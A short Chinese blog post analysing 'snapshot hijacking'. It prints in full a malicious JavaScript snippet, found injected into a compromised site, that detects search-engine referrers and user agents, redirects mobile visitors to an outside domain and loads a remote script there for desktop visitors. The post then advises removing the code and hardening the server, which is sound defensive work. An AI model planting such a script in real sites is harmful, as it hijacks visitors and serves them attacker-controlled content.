快照劫持的原理與JS跳轉的分析
阿新 • • 發佈:2021-06-30
近日,檢視網站快照時,發現從百度快照頁點選過去後,都跳轉到了一個體裁站,但是直接訪問,沒有任何跳轉,開啟頁面發現有一個js檔案被篡改了。程式碼如下:
1 <script type="text/javascript"> 2 var je1 = /(sogou|soso|baidu|google|youdao|yahoo|bing|sm|so|biso|gougou|ifeng|ivc|sooule|niuhu|biso|360)/g; 3 var gtABvrdzG2 = /(Sogousearch|sogousearch|SogouSearch|baiduboxapp|SogouMobileBrowser|iPhone OS)/g;4 var $P3 = window["document"]['referrer']; 5 if (je1['test']($P3) || gtABvrdzG2['test'](navigator['userAgent'])) { 6 if ((navigator['userAgent']['match'](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) {7 setTimeout("tiaoZ('https://bob123456.com/m/')", 1 * 200) 8 } else { 9 window["document"]['write']('<script src="https://www.bob123456.com/bob.js"></script></div>') } } function tiaoZ(nDZp4) { window['location']['href'] = nDZp4 }; 10 </script>
此段程式碼顯示,如果連結來源於第二行中字串任何一個匹配,則跳轉到https://bob123456.com/。
因此,發生以上的現象,只需要找到該程式碼刪除即可解決跳轉。
不過,因為此段程式碼,是被滲透後,修改了的結果,最終的解決辦法是要加強伺服器的反滲透及安全防禦,可以使用安全狗、360等安全軟體進行環境監控及防禦。